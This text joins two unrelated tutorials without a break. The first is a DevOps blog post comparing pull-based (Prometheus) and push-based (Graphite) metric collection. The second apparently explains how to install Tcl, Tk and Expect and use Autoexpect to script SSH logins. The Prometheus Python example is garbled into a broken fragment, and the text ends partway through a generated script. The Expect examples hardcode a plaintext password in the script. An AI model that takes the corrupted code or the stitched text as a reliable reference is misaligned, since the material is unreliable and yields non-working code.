Hey everyone in this article of tooling in DevOps we will talk about how we can save our monitoring metrics and use them to visualize in fancy graphs. Let’s say we have metrics of how much time our servers are taking to serve any request. Now we want to save it in some time series database so that we can use it later to plot it. What mechanism we can use to save this data and which is useful in that scenario. Pull vs Push We have two mechanisms to save our data in our database. In the push mechanism, we try to push our data in the database whenever it is available. In pull mode we just expose our data to our database for consumption and our database may keep polling for this data and then saves it in the next attempt. Where Pull is useful? This is useful when you want your database to decide when to get the data. This need a continuos server running to expose your metrics on a port which will keep running to which your database can get the metrics. Where Push is useful? Push is useful mostly in short running tasks where you don’t to run a continuous server to expose the metrics to the database. What you can use for pull-based model? Prometheus is very useful for pull-based model. You can expose your metrics on a server and port and define about the endpoint in your Prometheus server and it will pull the metrics on intervals you have defined. What you can use for push-based model? Graphite is a good option if you want to push the metrics from your application. Graphite exposes a port to which you can send the data and it will save it. Python Code to expose data to Prometheus from prometheus_client import start__ # Generate some requests. while True: process_request(random.random()) This is a simple example taken from Prometheus python client. You can run this and it will expose data to be consumed. You can see it in your browser using localhost:8000 Python Code to send data to graphite import graphyte graphyte.init('graphite.endpoint.com', prefix='system.sync') graphyte.send('foo.bar', 42) It seems far simple to push the code by this. By default, it pushes the data to 2003 port. You can learn how to setup graphite here. Now you can visualize this code using Grafana. We will talk about Grafana in the next article and try to draw some fancy graphs. Till then subscribe and stay updated.
https://www.learnsteps.com/prometheus-vs-graphite/
CC-MAIN-2022-21
refinedweb
431
73.88
Minimal routing extension for Flask Project description Flask-Mux is a lightweight Flask extension that provides a routing system similar to that of Express.js. It basically wraps Flask’s url route registrations API to add more flexibility. A Simple Example from flask import Flask from flask_mux import Mux, Router app = Flask(__name__) mux = Mux(app) def home(): return 'home' def about(): return 'about' index_router = Router() index_router.get('/', home) index_router.get('/about', about) mux.use('/', index_router) Links - Documentation: - PyPI Releases: - Source Code: - Issue Tracker: Project details Release history Release notifications | RSS feed Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/Flask-Mux/
CC-MAIN-2021-39
refinedweb
113
56.55
I’m really happy to share a wonderful guest post by Gunasekaran Veerapillai. He is working as a competency Head in Wipro Technologies Testing Services. Gunasekaran has covered an interesting transformation of automation industry – How it was few years ago and where is it heading now. He has also answered one core question whether we need dedicated automation experts to do the test automation or the normal testers can do automation also? So please enjoy and take it away Gunasekaran! “Test Automation is no more a niche skill” – “any good business tester with right attitude can create test automation scripts”. Over the last decade test automation has undergone multiple facets of changes. Same vendors have introduced new tools, open source tools have come to stay, and still some vendors are marketing their products as the ultimate solution for Quality. CTOs of the organizations are convinced that automation is going to give them greater benefits in squeezing the cost and time over long run. Service providers have introduced several ultimate frameworks which save the effort of automation testers – right from standard data driven, Key-word, Hybrid to script-less frameworks whereby business users can create automation scripts without the hassles of Java of VB scripting knowledge. This ultimately led us to the question if a dedicated automation test scripting community is required or the normal testers can do automation also? There are many articles stating that test automation should be group automation not a dedicated, aligned team working on automation scripts/projects. When I was managing a test automation project during 2002, I was hunting for testers with development background to be part of the team as the tool created the code in a propriety language similar to “C”. Any upgrade to the script is easily done by a tester who has the knowledge on the language. Then came the automation frameworks where the expertise in language helped the tester to write the “reusable functions” which are expected to save considerable time of the automation developers. Secondly test automation developers were expected to convert the already written test cases into automation scripts; they are rarely expected to have the knowledge in the business to understand the same in right perspective before creating the scripts. Test Automation as a preferred profession in Software Testing grew leaps and bounds over the next few years until the great recession struck us during 2008. Clients have started questioning the ROI out of the automation scripts developed over a period of time and the re-usage percentage of these scripts for the subsequent releases. They were really shocked to see that in many cases test automation has not yielded the desired result and scripts requires more maintenance to keep them LIVE to the current applications. Only very few clients where the technology is web centric have got excellent benefits in saving the cost and time due to Automation. Test Automation – Current Status: 1) From automating the Regression test cases, automation is moving towards life cycle test automation. Clients have started exploring the various stages of test life cycle which can be automated with the right set of tools required for automating such manual work. 2) Automation testers are expected to have good business knowledge with the advent of model based testing. Clients can not hire separate testers for creating the model and automating the test cases. 3) Business Process automated test packs helps the clients to reduce the time to market for the standard, established applications and products. 4) Clients are unable to choose the tool vendors as there are multiple boutique shops which offer customized frameworks and script-less automation frameworks. 5) The Test Management tools have been completely integrated with the test life cycle and on the fly customized reports are generated. 6) Integration with different vendor tools sets in terms of requirements management, test management, test script execution, defect management are easily managed by the team which give more flexibility in choosing the appropriate vendors/tools. ------------ 7) Multiple customized utilities which helps the testers to reduce the redundant manual work has been created and promoted as differentiators by the independent testing vendors and some are even pricing them on the value client gets. Let us come back to the question which we asked at the beginning if a dedicated automation tester is required or still automation holds key as a career ladder While one can agree that test automation has become much simpler and manual tester with good business knowledge can pick up automation, the expectation from an automation expert has gone to different level. Anyone can execute the test automation scripts created by an expert, but still there are different skill sets with more technical knowledge which cannot be easily acquired by a manual tester overnight.. To conclude, Test automation experts will remain strongly as a technical professionals though the standard redundant part of test automation (sounds familiar ? – history repeats) may get merged with the group testing. About Author – Gunasekaran Veerapillai (Guna) worked as Test Project Manager in Think soft, HCL Technologies and Covansys (CSC). Currently he is working as Competency Head in Wipro Technologies Testing Services. With 30+ years of experience in Banking Industry and IT, Guna is specialized in Test Portfolio assessments, Test process assessments and Automation assessments for many BFSI clients. Guna has co-authored a book called Software Testing and Continuous Quality Improvement Third Edition, along with Bill Lewis. He also presents papers on International Software Quality conferences conducted by QAI. Over to you Do you work or want to work on Test automation? You must be facing some challenges in implementing automation framework. Please do not hesitate to put your queries in comments below. I’ll make sure to get those addressed from the Guna. 71 comments ↓ Agree, manual to automation expert can’t happen overnight. But there is scope for business testers to become automation testers with right attitude. Well, while using opensource tools which use a complete OO programming language, do you think that a non-IT guy can do the coding ? i am a automation engineer ,usually i just create scripts with .net from predefined test cases …i want to understand below lines in more detail…..can you please explain ,or provide me some material regarding that……..………… Play & Record functionality can not do complete automation script. User need to do scripting logic to enhance automation script. scope of qtp and selenium in competittive market?which should be preferred n y? Well said. Nice article. Thanks for sharing. Nice article… I am working as a tester but no automation… I have a little programming knowledge in C. Now if i have to take up testing as my career what i have to do ? like should i take up software testing course or something else? Please guide me . Thank You what are the scope for a tester ? That was a really nice article. What is the scope of a Non-IT guy who don’t have a programming knowledge as an Automation Tester. Can he be able to compete with the Auto Testers who are from Programming background……?? And how his future wil be… I am working as a tester but no automation… I have no knowledge in any of programming lanaguge . Now if i have to take up testing as my career what i have to do ? what i ahve to learn to became a automation tester. i should go for learning c, database .please guide . Good article… I am working as a Tester. We will do only manul testing, I am interested in automation testing, I know to use the tolls like Qtp 9.2( using VB scripting)load runner etc.. and have programming knowledge also how can I move to automation pls guide me, also tell me we have good career in testing? hi , i am working as a manual tester and want to learn automation i have basic knowledge of java and selenium ide , i want to know from where i have to start automation HI, I was also in manual testing & recently a one & half year back i just transformed in to automation side.Now, I can say that i have some good automation skills. It’s all about attitude & how you take efforts to aquaire specific skills, it may involve high risk which can impact deliverables to client.But its all about how you do improvisation & deliver with minimum short-comings. keep learning & grab the knowledge,discuss with experienced automation experts on issues,observe small detail things,always ask questions..!!These factors are important to become automation expert..!! All d Best..!! Vishal (Next Time Don’t DO it,Automate it..!!) Hi I am working as a Manual tester and I want to learn Automation..I request you to guide me which automation tool should i learn? i want to learn open source tool. Tell me Good opensource tool Thanks ! Nice Article. Yes . I do agree that automation experts will remain strongly as a technical professionals. I do automation testing from last 1 & half year on Java & networking (with regression approach) its really a challenging job where you need to complete task with tight deadlines & have to do 100% analysis of failed case.For analysing failed cases one must have good knowledge of language with which tool has been developed. Hi Thanks for sharing useful article like this… I am working as a manual tester for mobile application. I am very interesting to learn automation tool.. So i startup with Apache-Jmeter testing tool, can u suggest please is it good one.. :-) Hi I would like to say this article the was posted on right time as the QA industry is moving fast from manual to automated testing or script generated testing. Having experience of 5 years working as manual tester now I am struggling to continue in this field because of lack of experience in automation tools. Fact is that now a days employers prefer testers only those who have some basic programming/coding skills . There is no question of can normal testers do automation if they are looking for a testing career then they must, Otherwise manual testers won’t survive long. It is a very good article. Though automation has become integral part of the STLC, there are projects where automation is being handled by specialized people. Especially, in agile environment, developers and automation specialists are supporting functional test automation. It is well said in the article “No client is ready to wait 6 to 8 cycles to get the return on investment”. Thanks for a nice article. @ zubair – Coding in these test automation skill does not require in depth knowledge on these languages. You can always pick up easily if you have right attitude to learn. I never had coding experience in the first 15 years of my life and I learnt all these over the last decade. @ Bharat – The role of automation experts has changed very much during the last few years. Automation architects are expected to give a cost effective solution which will give quicker ROI. As Risk based testing, we need to identfy the critical business secnarios which if automated will give continous and greater benefit to clients. Identifying the right set of testing tools and automating the entire test life cycle is expected from automation experts. @ Rajiv kumar singh – While QTP overrides seleniums’ area of coverage, selenium has established very well in the market – may be except BFSI clients, most of them started using selenium. While QTP is a commercial tool with good support , selenium is still depends on the open soruce community. @ vivek @ Lakshmi- Testing as an career is great. To become an automation expert learn tools like selenium and create scripts in the projects where you are working. Add value in the project and differentiate yourself. Thanks!! Good Article.. i was working as a manual tester.. now am automation tester.. Scripting is realy a different thing and very challenging job.. i enjoy doing scripting… The concept of automated testing well explained, currently working as PHP Developer looking for switch in Software testing ,let me know how my experience useful in software testing As I mentioned elsewhere, to become an automation tester, we need only basics of programming languages as the testing tool guides the developer. But you should continously work on this. Try automating some of your test cases using selenium. you will learn by yourself. Great article.. Put on here on right time. Encourages one to learn automation. Thank you…! Its a nice article and all other article which are posted in this site are also very helpful, this software testing help website is great. helping many people to choose the right field and answers their quires regarding testing.. i just want to say thanks to the founder of this site.. great work done sir g.. continue to doing that it help us a lot…. It’s really worth to see that most of the comments similar to others especially they recommend Selenium and QTP. Since Selenium available in Open Source Market, people prefer to select Selenium Tool. Thanks for your advice Guna, let me get into Selenium and will be back shortly with lot of questions. i’m fresher,i like to work in your company. Since I am fresher, so I don’t have any work experience. But I want to learn more with others and do my at level best. i know .net and i can work in that.. i update the resume in your sit .. please do me needful.. thank you Great article, i am interested in gaining test automation skills especially in selenium. will be back with questions, especially on automation Hi, I am Priyanka Sahu. I have one year experience in manual testing. I have all the basic knowledge of Vbscript , QTP, Advanced Qtp. QC. I want to be expertise in this area. I want to know whic are the certification or any other courses to make myself skilled in this area. I want to learn selenium and java also. Please reply to my answers. Priyanka Please undergo some training and practice. Certifications are costly and may not necessarily help you. You practical experience will come out in the interview which will help you. Selenium and java are good options. please proceed Gunasekaran Veerapillai Hi, Guna ur artical is good. I want to learn automation tool which one will help me in long stand is it QTP or SELENIUM/ Load runner – Which training center in chennai where i can get pratical training. Currently i jobless can u help me by giving ur valuable guidance. Thanks Hi started by career in it dept of bank and joing IT in manual testing in Banking domain. I have tested financial products one for backoffice reconciliation and another for transaction monitoring. This took me 5 years. Now, overall 7+ yrs in manual testing , very hard to find oppurtunities. If i decide to take automation, how my exp. would be counted? as there could be more numbers in automation industry? is it wise to takeup any automation tool now? then how my previous 7 yrs would be considered ? How much importance would be given to my exp 7yrs in manual & beginner in automation? Your expertise in testing carreer would help me in resolving my problem areas. THanks in advance Hello sir As I am working in testing field in mobile application company and i want to grow with the testing field and want to switch in the white box testing as i have done MCA having programming knowledge, please give me guide line to explore my testing career. Hi , I want to switch my career to testing and have no experience in testing . If i start with ISQTB and then learn those testing tools and languages can i get into this field. thanks for your help. SIR I KNOW THE THEORICAL CONCEPT OF JAVA AND CURRENTLY WORKING IN MANUAL TESTING. BUT I WANT TO LEARN SELENIUM AND LOADRUNNER.SO CAN I UNDERSTAND THE ALL THE CONCEPT WITHOUT CODING KNOWLEDGE??. PLEASE GIVE SUGGESTION.AND HOW MUCH PROGRAMMING KNOWLEDGE ARE REQUIRED TO LEARN THESE TOOLS AND APPLY ON SOME PROJECT Hi. I have 12 months of experince in manual testing.I know the basics of JAVA and SQL. Now i got opprtunity in 1.ETL Testing and 2.Automation testing ( SELENIUM ). Please advice which one to choose for better career growth. hi… I just completed my BTECH (ECE, 2012 PASSOUT, 69%).. so, can anyone tell me .. is it a good option to choose a software testing as a career for making money for skilled person .. do you feel its a interesting job & better option for making maoney, comapre to software developer???…. what might be the salary of an software test engineer wit 2 yrs of experience??.. I am working in software testing(manual) and want to shift in Automation with It background is it a fruitful decission for me?pls inform me and give me any suggestion how can i learn automation testing??if any institute address or something is given to me in kolkata i will be greatful to u. Thanking you Pradipta–IT–2011(B.tech) Hi, Nice artical. I just started to read about testing tools and i started to read manual testing. Please give an advice do i need to start on manual or Automation. I am working as a Manual Tester for Web sites from last 1 year. I have knowledge of C,PHP,MySQl. I want to get shifted into Automation. Which scripting language do i need to learn Pearl,Shell or any other. I need your guidance. Do i need to learn QTP/WinRunner/Load Runner. Please help me. Neeraj (M.Sc.(Computer Science)) 9922227448 too good article..thanks for the same..im in manual testing and surely above blog show me the way to move to autoamation… but please let me know, as my company dont have any automation tool..how one should move to manual to automation?? awaiting your reply..Thanks..;) what are the scope for a tester ? Hi , Nice article..i m in manual testing how can i improve myself in automation , if i know automation from outside means also how can i implement or show my knowledge in this field. Couldn’t agree more with the below lines – “Test automation experts are expected to give the overall automation strategy for the entire product/application life cycle – gone are the days when they were requested to automate the already finalized test cases or scenarios.” This is what I have been seeing from some time… Great Article Guna!!! I am a Manual Tester. Recently I have started learning Selenium. Let me tell you guys I don’t have any programming background. Still I find Selenium & Java are easy to learn and implement. Any of you planning to start Selenium, go for Selenium Webdriver. Its really great tool. I have fallen in love with it :) Hello, I am working as a Senior test engineer and testing mobile applications and that too manually. i am from electronics background and now my experience is around 4+ years.i am finding it difficult to change the domain as i have not got any automation experience , and also the knowledge of any programming language. it has been very haphazard situation for me.please let me know where to start from to get into automation and get in some good organization to enhance my skills. @Mohamed Shaikh, send me the link to download the selenium…. Good article :) Nice article…. I am working in a manual testing,coming from non it background,Is good future for qtp automation tool? hello, I am a SCJP(1.6), but recently while working i find testing, specially automated unit testing interesting. i am keen to know, is it a good option to have a shift from development to automated testing? if yes, how? if no, why??????????? I am working as a maual testing, i want to change from manual testing to automation testing…now Am learing php script and whether php is helpful for automated testing?plz guide me more detail @ Mohamed Shaikh – Hi Mohamed Shaikh, can u pass ur mail id or your contact number. i want to discuss about your experience in Web driver as we are planning to implement the same in our company. Sample selenium code for people interested to use Selenium package sampleTest; import org.testng.annotations.Test; import org.testng.annotations.BeforeClass; import org.testng.annotations.AfterClass; import com.thoughtworks.selenium.DefaultSelenium; import com.thoughtworks.selenium.Selenium; public class NewTest extends PhyWebTestBase{ protected Selenium sel; @Test public void start() { } @BeforeClass public void startServer() { sel = new DefaultSelenium(“localhost”,4444,”*firefox”,””); sel.start(); try { sel.open(“/”); sel.waitForPageToLoad(“30000”); } catch(Exception e) { } } @AfterClass public void stopserver() { sel.close(); sel.stop(); } } Hi, I am working as manual tester & want to switch to automation testing. Can you please suggest which tool is in most demand in India. I am thinking of taking Selenium tutorials. Kindly guide.Its urgent. Regards, Mona Hi, I am also working as an automation tester, but i know i am not good at it. i am wondering whether i should remain in manual, or not. Will i be able to pick up on these skills? i really get an inferiority complex when i see my other colleagues who r so good in automation. i am good at logic, and did wll in programming papers, but real time jobs are different ball game all together. please can u suggest me a solution / advice? i am really upset any one can give me suggestion i work in manual testing so what type of testing course i do than i will move in automation testing………………reply urgent Hi Guna, fresh graduate. AN d I am a test engineer now… what will be your advice in software automation… I don’t have any experience about it now.. Thank you in advance :).
http://www.softwaretestinghelp.com/test-automation-specialized-career/
CC-MAIN-2016-22
refinedweb
3,651
56.66
Hello, my name is Richard Russo. I’m the newest member of the Visual C++ compiler front-end developer team, having started in January. I’m not new to MS though as I spent the last three years working on Windows Vista. I’m excited to be on the front-end team because compiler development has been a hobby of mine for a few years. Most posts on this blog discuss new features that are added or what daily work is like here in various positions. Instead of that, I’d like to discuss my thoughts on a particular aspect of C/C++ that I think deserves more design attention: header files and the preprocessor. I’ll probably be discussing a few hypothetical features here, and I just want to say up front that this does not necessarily mean the VisualC++ team will be working on or delivering these features. In writing up these ideas, mainly what I’m hoping to do is spark discussion and get your feedback. There should be a link below to leave comments so please do! First off, what are header files really for? Well, without doing research into the design rationale of Kernighan and Ritchie, the most basic purpose it serves is to allow us to maintain units of code for separate compilation in a declare-before-use language. You can imagine that without the preprocessor we’d have to declare the same things in every source file — we’d quickly get tired of that and probably hack something together that looks a lot like the current preprocessor. Sure, we use the preprocessor for lots of clever things, but to me that is its essential purpose. What are some frustrations with header files? Well, they seem to contribute to really long build times. Have you ever used the preprocessor modes of cl.exe? You can access those with /E (preprocess to stdout), /P (preprocess to a file), and /EP (preprocess to a file, but don’t produce #line directives). Give it a try, for instance “cl /P foo.cpp” will produce “foo.i”. On my system, I wrote a quick Windows “hello world” with the MessageBox function. When I preprocessed this 5-line program it wound up being roughly 200,000 lines of source code for the compiler to parse. Now imagine what it is like in your project if every source file includes windows.h. You can imagine that parsing 200k lines of declarations slows down the compiler a bit. What else? Well, header files seem redundant. We have to type class names, method names, parameter lists, etc. twice. While that’s certainly not the most costly part of developing a C++ project, it does probably slow your thought process down a little. It also creates additional maintenance. If you change a parameter list in one place you need to change it in another. Again, not a huge cost but a real life cost. We’re still not done yet – I can add a few more potential issues. Header files change depending on the context in which they are preprocessed — or to say it more succinctly they have isolation problems. What if you are integrating two libraries that both have a foo.h and both use the guard macros FOO_H? Well, that’s something you as a coder have to take time to deal with. Along those same lines, if you have a really big project without carefully designed headers, you might notice differences in compile-time (or even potentially run-time) behavior depending on the order in which you include headers. It’s not the end of the world, but it has a cost that you have to pay to investigate and fix the problem. I think most C/C++ coders would agree that the preprocessor comes with a price tag and a long list of potential pitfalls. Well, it’s not all bad right? Certainly. The first benefit I’m thinking of is the most interesting to me. We have a situation in C/C++ where we have to declare before use, and we put all those shared declarations in header files. We can easily produce separate compilation units that are mutually-dependent in this way. But because the mutual dependencies are satisfied by the header files, in general all of our source files can be compiled in parallel. I think most people would agree that this parallelism is a good thing. Take a look at counter-examples to this. Say you’re compiling a C# program. First off, you probably rarely compile that program one source file at a time. You pass a collection of source files to the compiler, the same way you pass those files to the C/C++ compiler. But the C# compiler must treat that batch of files differently. The C/C++ compiler can compile them all separately and then finally consider them as a unit for linking purposes. For the C# case, the compiler has to consider all of those source files somewhat simultaneously because they can have inter-dependencies: you can refer to a class in another source file without having to give a declaration of it first. In short, in C/C++ a translation unit is always a single source file and headers, whereas in C# the translation unit is potentially multiple source files. At the very least, that makes it seem more difficult to parallelize the C# build process. No doubt it is doable, but there will be some amount of overhead associated with this issue. You can think of this as the C/C++ coder paying the cost of this overhead by maintaining header files. No doubt there are other benefits you can think of to header files. For instance you can use the macro preprocessor to add rudimentary syntax to our language, to help “automate” some tasks. What can we do about it? I’m going to discuss two proposals. One of them is not mine at all and regards modules for C++. The other is perhaps a more practical tool that might help you diagnose issues with header files in your codebase. The word “module” has a lot of different meanings, even in the context of the coding world. I would say that many programming systems out there (notice this does not include C and C++) provide module functionality which is some joining of the concepts of separate compilation and namespaces. C and C++ give us facilities for separate compilation, and C++ gives us namespaces, but it does not give us a unified feature that encapsulates these together, allowing us to refer to a separately compiled module and import selected symbols from it. Enter Vandevoorde’s Modules for C++ proposal (). This gives us a mechanism by which we refer to potentially previously-compiled modules instead of including source code of declarations in our projects. This has some important benefits in terms of the caveats pointed out above; for example it does have isolation properties and it does not have the maintenance burden associated with the redundancy of header files. I can see usage of this feature negatively impacting the parallelism property if used in certain ways. For example (and similar to the C# case), if each source file in your project is a separate module, the compiler will have to analyze dependencies before attempting to compile the files in parallel. Luckily, the “import” statements give it some clues about these dependencies and can probably be scanned quickly, so there are no doubt ways to solve that problem but there will be some amount of overhead. I don’t have much else to add to Vandevoorde’s discussion in that paper, it is very thorough, and if you’re interested in the design of such a module system and potential issues I encourage you to read it. As fun as it is to consider redesigning the world, what could we potentially do today, without changing the infrastructure of header files, to make things better? I can envision tools that generate headers or scan your header files and greater code-base and attempts to diagnose problems for you. Most of what I argued above as problems with header files had to do with a cost involving work for a human programmer. Well, maybe an automated tool can help reduce or eliminate that cost in some cases. The first suggestion is around “automagically” generating headers. Think of a compiler which analyzes your C and/or C++ source and extracts just declarations into a minimal header file. You might have a source file which includes windows.h and then declares several classes. The header file would need to contain declarations of those classes, and probably just a few of the typedefs declared in windows.h and the various headers it includes. The result would most likely be fairly short; perhaps all you need to declare those classes is a few typedefs from windows.h like HMODULE, HWND, etc. This tool could be potentially integrated in to your IDE so that when you change the source file it automatically updates the header if necessary. For efficiency, the tool could assume that system headers like windows.h don’t change. Another suggestion for efficiency might be to have the tool generate a header for an entire library instead of the single-translation-unit level. Such a tool seems like it could potentially help with the maintenance and build time issues. That whole windows.h header would need to be parsed by the header-generating tool, but that cost is amortized. It is paid only when you modify that source file, and you reap the rewards every time you compile another source file that includes the associated header. I see potential problems in this area, but if you have a code-base that is partitioned the right way, you might even be able to check in those generated headers and save even more compile time throughout your development team. What about other issues, such as isolation? The header-generating tool might be able to help with some of the issues there by creating “well behaved” header files. For instance it might generate preprocessor code that saves and restores the state of macros inside the context of the file, or generating headers that don’t use any preprocessor features other than perhaps for guard macros at the beginning and end of the file. But what would likely be more useful is some sort of tool to analyze your headers. I’ll give a few simple examples. It could look for isolation issues such as two different header files in your INCLUDE path with the same file name or that use the same guard macro. It could find headers that don’t have proper guard macros. It could build a dependency graph that shows you how one header’s definitions impact the definitions another, and what the include graph looks like for particular headers and source files. Such an analysis tool might help you get your build times down as well. For instance it could scan your source files and tell you that it is unnecessary to include a particular header because none of the declarations are used. Or it might tell you that instead of including foo.h which includes bar.h, you could just include the latter because this particular source file only uses declarations from bar.h. I’m afraid I’ve used up my time and space for this post, but I hope it was an interesting read, and got you thinking about what features regarding the preprocessor and header files might make you more productive in your C and C++ codebase. Please leave comments if you liked these ideas, didn’t like them, or have your own. Thanks for reading! Richard Join the conversationAdd Comment I’ve found that precompiled headers massively cut down compile times when used properly, but determining which files are most effective in the PCH, and what files are still missing, is time consuming. Another thing that would help is to get the PSDK team to clean up the rampant #define abuse in the Win32 headers. I could speed up my build if I put windows.h in the PCH, but I’ve been burned too many times by symbols like OpenRaw getting #defined, so I partition it off as much as I can, and the files that have to include it compile quite slowly. And having two PCHs in a project is error-prone. Finally, it seems like Intellisense doesn’t take advantage of PCHs. When I traced CreateFile() calls out of FEACP to track down what was triggering an Intellisense infinite loop, I noticed it reading the same files over and over. You can use a script to embed #pragma message("Compiling _filename_") directives within each header included in your project. Then search through the build log(s) to count what’s compiled most frequently. It’s then a bit easier to decide what to precompile. Regarding your statement: "What if you are integrating two libraries that both have a foo.h and both use the guard macros FOO_H". Isn’t this type of header guard unnecessary since we have #pragma once In the past I used these header guards but no longer do after I noticed Visual Studio 2005 generates (.h) files having only a <b>#pragma once</b> and no longer have something like: #if !defined(_MYDLG_H__) #define _MYDLG_H__ My questions: a) What version of VS added #pragma once? b) Doesn’t this replace old style header guards? (see above) c) Are there any disadvantages to #pragma once? @ jamome: I’m not Richard, but I can possibly answer your questions: >> a) What version of VS added #pragma once? From the looks of my VC6 header files, you need a compiler version (_MSC_VER) of greater than 1000. VC6 shipped with compiler version 1200. >> b) Doesn’t this replace old style header guards? (see above) Probably not if you want to write portable code. If you don’t care about portability, then it’s probably fine to use #pragma once. Regarding your third question, I don’t know of any, besides the portability issue. Thanks everyone for their comments so far! In response to Jamome: >> Regarding your statement: "What if you are integrating two libraries that both have a foo.h and both use the guard macros FOO_H". Isn’t this type of header guard unnecessary since we have #pragma once The intent of the example was more along the lines of you as a coder having to integrate libraries from various sources, potentially code you didn’t write and may not want to change for various reasons. In that case the library developer might not use #pragma once for portability or other reasons. I agree with ChrisR that I don’t believe there are any particular disadvantages to #pragma once over the guard macro idiom, other than the portability issue. Hope that helps, Richard Instead of choosing one over the other, do both! 🙂 Portable headers should use idempotency guards that look like this: #ifndef PROJECTNAME_HEADERNAME_HPP #define PROJECTNAME_HEADERNAME_HPP #ifdef _MSC_VER #pragma once #endif // Code goes here! #endif // Idempotency The portable "#ifndef PROJECTNAME_HEADERNAME_HPP" guard is for other compilers (some will recognize the guard in order to avoid opening the file again, as long as nothing exists outside of it), while the "#pragma once" is for Visual Studio (which tells it to avoid opening the file again, for faster builds of very large projects). The "#ifdef _MSC_VER" prevents other compilers from seeing the Visual Studio-specific pragma. Of course, Visual Studio headers do not necessarily follow this practice because they do not have to be portable. Prefixing your macros with your project name is a general practice that avoids clashes, since macros aren’t aware of namespaces. Stephan T. Lavavej Visual C++ Libraries Developer I liked the modules proposal a lot! Unfortunately, it’s not going to be in the new C++ standard. The committee liked the idea, but thought that it was too much work to polish the proposal in time (before 2010), since there there is no available compiler where it could be tested (IOW, it’s too big and it’s not "existing practice"). Probably modules will be standardised in the future, but it would be nice if compilers started to ship with a few optionally-enabled new features. If the programmer wants to test modules, or if he thinks they are useful to his project even if the syntax or semantics are not in they final form, the feature can be enabled. We’ve been doing a lot of thinking lately about header files and modularity in C, and we’ve developed a tool called CMod that enforces modularity in C. The CMod web page () contains a short paper we wrote about our system and an earlier implementation. We have been improving the system since that paper was written, and we expect to have a new paper ready in a couple of weeks, with more evaluation and tighter rules. A finished implementation will be available then, too, but you can download the latest version from our web page. We look forward to comments you might have. -Mike (and Saurabh, Jeff, and Pat, the CMod team) This is a really interesting topic. The application i work on is quite big and has been developed over a long period of time. Over times the dependencies (real and fake) has grown but we try to clean it up bit by bit but that takes a lot of time. The main problem is build times, we use Incredibuild to do parallel builds and that helps a lot. It sounds quite good to have a tool that could generate "well behaved" header files with a minimum of dependencies and also a tool that can visualize dependencies. We built a small simple tool that can create an include graph from a source file and that helps alot it does not do any analysis of the graph to recommend what to do but that would also help alot. Another thing that i have thought about is sharing precompiled headers and preferabliy beeing able to use several precompiled headers for a single project. We generate a quite large number of dll:s and several projects should be able to share a common precompiled header. Anything that could help in this area is interesting and iäm looking forward to more of this. Is there a preprocessor macro that can be checked to see if precompiled headers are being used for a particular complilation unit? I like to test my files to see if they explicitly include everything they actually need, and nothing extra, so I test compile them individually as I write them without using precompiled headers. However, then they including everything in stdafx.h un-precompiled, which is slow. I’d like to stick a guard in stdafx.h itself to ignore it’s contents if precompiled headers aren’t being used. the best way to improve build times is to build all your C++ files together in one ‘bundled’ cpp file like this: #include "src1.cpp" #include "src2.cpp" #include "src3.cpp" … yes it means you might have to resolve name conflicts b/w duplicate static definitions, but these issues are usually trivial and the build time increase is dramatic, and the codegen is more optimal as well. Try it, you’ll like it. Richard, Take a look a this link: it is a preprocess tool to generate header files!
https://blogs.msdn.microsoft.com/vcblog/2007/04/19/header-files-and-the-preprocessor-cant-live-with-em-cant-live-without-em/
CC-MAIN-2017-22
refinedweb
3,258
61.56
If from the remote system; expect is the tool to use for that interactive session. But what’s better than creating a script to automate some repetitive task? Automating the creation of that script, of course. And, you can do just that with Autoexpect. Creating an Expect script can prove tedious, especially for those of us who have attention deficit disorders. It’s hard to focus on each detail of a stepwise procedure to perform a simple but repititious task. That’s where Autoexpect saves the day. Autoexpect “watches” your keystrokes and writes them to an Expect script that you can then execute to perform the recorded task. Autoexpect isn’t perfect but it beats taking the painfully manual approach to creating Expect scripts. The Basics To use Expect or Autoexpect, you will need Tcl, Tk and Expect source code unless your distibution has autoexpect packaged with Expect. Installation by either method is easy to accomplish but your particular distribution might not include Autoexpect as part of the binary packages. Grab the sources for Tcl and Tk from the Tcl Developer Exchange and the Expect sources from Sourceforge.net Expect site. Compile Tcl first, then Tk and finally Expect. There’s nothing tricky about these packages. Unzip them and compile and install each with a simple: ./configure ; make ; make install. Once you have all three installed, it’s time to try out some simple Expect scripts. Lowered Expectations Expect, as explained earlier, automates repetitive keyboard interactive tasks. To “teach” the script how to respond to prompts, you must know what the prompts are. The only way to do that is to step through a session yourself and record the prompts and responses as you go. After going through this exercise, you’ll understand why you’d want to use Autoexpect. In this example, you’re going to create an expect script to connect to another system, login, run a ps command and then logout. To begin, open your favorite text editor (vi, of course) and enter some commands. #!/usr/local/bin/expect -f spawn ssh slartibartfast expect "password: " send "beeblebrox\\r" expect "$ " send "ps -ef\\r" send "exit\\r" expect eof Save the file with any name you want and then make it executable. Now, an explanation of the Expect script you created. The spawn command launches an executable file for you. In this example, the command is ssh with host (slartibartfast). The “expect” line is the last part of the prompt that the interactive script should expect to “see” for this interactive session. In other words, the script receives a prompt for the password. On the next line, you “send” the password prompt your password and a return (\r). The next item that the script should expect to see is the “$” prompt. Now, you send it a command: ps -ef\r. Finally, send the remote system the exit command to end the session. Do you see how Expect works? You send a response to a prompt and then tell the script what to expect from the system. And, it goes back and forth like that for an entire session. You can also see how monotonous writing a very long or complicated script could become. Great Expectations Now that you’ve seen it done the hard way, have a look at Expect the way you’d have expected it to work. To use Autoexpect, simply type autoexpect at the command prompt. You’re returned to an interactive shell while Autoexpect records your keystrokes, mistakes and all, into a file named, script.exp. In this example, you’ll step through the same procedure but this time, you’ll perform the keystrokes as if Autoexpect isn’t watching you. $ autoexpect autoexpect started, file is script.exp $ ssh slartibartfast beeblebrox (Typed in but not shown on screen) ps -ef exit Connection to slartibartfast closed. $ Ctrl-D autoexpect done, file is script.exp $ Before you execute the script, you’d better take a look at it. Remember that Autoexpect isn’t perfect. Rarely do you create a script that doesn’t need editing. If you make any typos along the way, you’ll have to clean them out or each time you run your script, the typos will repeat along with your other commands. When you open your script.exp file, you’ll notice a lot of text in it from the author, Don Libes of the National Institute of Standards and Technology. Scroll down to where your script begins with set timeout -1 Here is the script as Autoexpect created it (shortened due to the ps command output). set timeout -1 spawn $env(SHELL) match_max 100000 expect -exact "khess@debian5-1:~\\$ " send -- "ssh slartibartfast\\r" expect -exact "ssh slartibartfast\\r khess@slartibartfast's password: " send -- "beeblebrox\\r" expect -exact "\\r Last login: Wed Jul 21 11:23:28 2010 from 192.168.1.77\\r\\r \\[khess@localhost ~\\]\\$ " send -- "ps -ef\\r" expect -exact "ps -ef\\r UID PID PPID C STIME TTY TIME 